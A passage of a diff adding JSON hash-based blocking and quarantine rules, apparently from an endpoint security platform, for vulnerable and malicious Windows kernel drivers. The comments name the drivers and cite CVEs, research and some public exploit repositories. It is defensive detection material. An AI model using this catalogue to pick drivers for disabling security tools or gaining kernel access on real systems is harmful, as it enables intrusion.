+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.816755Z",
+ "creation_date": "2026-03-23T11:45:31.816758Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.816767Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4c346263e92ab248bcd19a18014ff5dbedeb19b8299e0bcec0fa74946dbee6c0",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d7a4bfeb-d73b-567b-939c-5c0db09fa268",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.827858Z",
+ "creation_date": "2026-03-23T11:45:31.827860Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.827865Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e2a5bc4aa25afc60dc545a9fa92bee958942741241503f943f2bf622e35db285",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d7b6d48c-3e12-55cb-b505-2cac0601ac73",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.829132Z",
+ "creation_date": "2026-03-23T11:45:30.829134Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.829140Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7884466b94141efa307b792801b9481a90d3034b568184836fd81cd5ffa341c6",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d7bd4c7d-d6dc-5075-a97f-eb788ae400e2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.140474Z",
+ "creation_date": "2026-03-23T11:45:31.140476Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.140482Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5e901746bce330cc13800168090d211718636e36d6ce8ab77519fb5d21bee06d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d7cc47ee-a857-5fd0-8413-bceba21e3d99",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.812205Z",
+ "creation_date": "2026-03-23T11:45:31.812207Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.812212Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6cdaefad0fedae063ce0cd212eaa2e2c7943156b997e36d1330e9901fb49176f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d7dc113b-0bd1-5702-a64a-d0a5704eafcb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.985448Z",
+ "creation_date": "2026-03-23T11:45:29.985450Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.985456Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "52d5c35325ce701516f8b04380c9fbdb78ec6bcc13b444f758fdb03d545b0677",
+ "comment": "Malicious BlackCat/ALPHV Ransomware Rootkit (aka dkrTK.sys) [https://www.trendmicro.com/en_us/research/23/e/blackcat-ransomware-deploys-new-signed-kernel-driver.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d7e3c98d-ef4c-50d7-8548-c9f8269afc62",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.825367Z",
+ "creation_date": "2026-03-23T11:45:30.825371Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.825378Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f22d6bfdd23fba86b06cd1081995b1c2766d819713a42a2bb15e14677e9f1314",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d7eca501-fe33-5a00-bede-90b0529723a5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.621444Z",
+ "creation_date": "2026-03-23T11:45:29.621446Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.621451Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b6fd51e1f57a03006953e84fd56cc2821cc19e7c77c0474e1110aabaacaf03df",
+ "comment": "ASUSTeK GPU vulnerable physmem driver (aka AsIO2_64.sys) [https://syscall.eu/blog/2020/03/30/asus_gio/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d804a6f7-c3c1-5ca1-b745-adb155157b8c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.618711Z",
+ "creation_date": "2026-03-23T11:45:29.618713Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.618719Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d4288c055c6d68b4a45df501877443e544b31c193f8559c8c7eac927ae738e8a",
+ "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d8134188-b101-53d9-a590-bde273178114",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.156214Z",
+ "creation_date": "2026-03-23T11:45:31.156216Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.156221Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9e4f46529a54b66e135162a6efe28db3148158427a6ce9e39cb9f769011073bd",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d820a63d-6d65-51c9-9605-98cd2dc2f661",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.145809Z",
+ "creation_date": "2026-03-23T11:45:32.145811Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.145816Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "82d928c586159342837cb457f45619f49db38bb91631a82e4f1b373fb994cd73",
+ "comment": "Malicious Kernel Driver (aka driver_82d928c5.sys) [https://www.loldrivers.io/drivers/af8ef3c0-8686-4112-992b-86587a4a9060/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d8265fae-9e46-5fda-adc5-24a8902cfba9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.982307Z",
+ "creation_date": "2026-03-23T11:45:29.982309Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.982315Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "710639fd1eb76520e8733840ad78a81e09ce03930e4d3c47998e3162ae95f90e",
+ "comment": "Vulnerable Kernel Driver (aka SSPORT.sys) [https://www.loldrivers.io/drivers/c854b612-0b9f-4fc3-a7b8-a93bed7a291e/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d82de877-2da1-5cd5-80d9-b7179c3d58a7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.816137Z",
+ "creation_date": "2026-03-23T11:45:30.816139Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.816144Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "42446592b42e34bf569a631265bcaf2a2192d424531a343a7680f52199b88462",
+ "comment": "Vulnerable Kernel Driver (aka sysconp.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d8397a5d-15cd-525a-8c02-7a9dabc96cae",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.478688Z",
+ "creation_date": "2026-03-23T11:45:31.478691Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.478700Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e409afcc70f34df244e72837965371014212d6d705bbd650ee582f47b4189382",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d83c2b3d-1676-5e8b-8814-083672f23a09",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.146349Z",
+ "creation_date": "2026-03-23T11:45:31.146351Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.146357Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1f3c943f4f9924224f8b61f37d79c3a651c1dfeb1527a65e5798a9ae980293b2",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d8408a07-9abf-59b0-bd5b-e8c5c24aa325",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.156256Z",
+ "creation_date": "2026-03-23T11:45:31.156259Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.156264Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0036359ae6b581abc80fcbecd4169210907cbee598819ae3ad08f7f09af19b32",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d84a612e-e27c-5c3a-a86b-711a780d8113",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.610458Z",
+ "creation_date": "2026-03-23T11:45:29.610460Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.610465Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "592f56b13e7dcaa285da64a0b9a48be7562bd9b0a190208b7c8b7d8de427cf6c",
+ "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d84be08c-447a-57cc-a781-570026175ad0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.619784Z",
+ "creation_date": "2026-03-23T11:45:29.619786Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.619791Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5147b0f2ca9d0bde1f9fceb382c05f7fa9c333709d7bf081d6c00a4132d914af",
+ "comment": "Super Micro Computer dangerous update tool (aka superbmc.sys) [https://www.loldrivers.io/drivers/9074a02a-b1ca-4bfb-8918-5b88e91c04a2/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d8611dc8-4ea4-549e-90ae-aa66eaf76def",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.609465Z",
+ "creation_date": "2026-03-23T11:45:29.609467Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.609472Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "12ae98c0f1d7209cffe3bc8be5b76aa1f4faba40af99a6dd299462cdd3820c94",
+ "comment": "Gigabyte vulnerable driver (aka gdrv.sys) [CVE-2018-19320] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d895b4ba-43ce-5f56-8790-240e8c08db5e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.141838Z",
+ "creation_date": "2026-03-23T11:45:31.141840Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.141845Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b06f8434efce1f2d72315e10ef48bc8a51bfdb4c69a016031a308369d5dd5c70",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d8ae4c08-9bc3-55a2-b3aa-601508a855e6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.975096Z",
+ "creation_date": "2026-03-23T11:45:29.975098Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.975103Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a13054f349b7baa8c8a3fcbd31789807a493cc52224bbff5e412eb2bd52a6433",
+ "comment": "Vulnerable AMD Ryzen Master Driver (aka AMDRyzenMasterDriver.sys) [CVE-2020-12928, CVE-2023-20564] [https://www.loldrivers.io/drivers/13973a71-412f-4a18-a2a6-476d3853f8de/, https://github.com/tijme/amd-ryzen-master-driver-v17-exploit, https://github.com/zeze-zeze/HITCON-2023-Demo-CVE-2023-20562] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d8b128d4-8cbb-52c7-8a01-fd61c7a7033a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.831055Z",
+ "creation_date": "2026-03-23T11:45:30.831057Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.831063Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "93a14d935109917becd87acd891f5ae78a338adf7cec549868fafbc196ea642a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d8b796fa-60c4-5daa-b43d-175b8463ae9e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
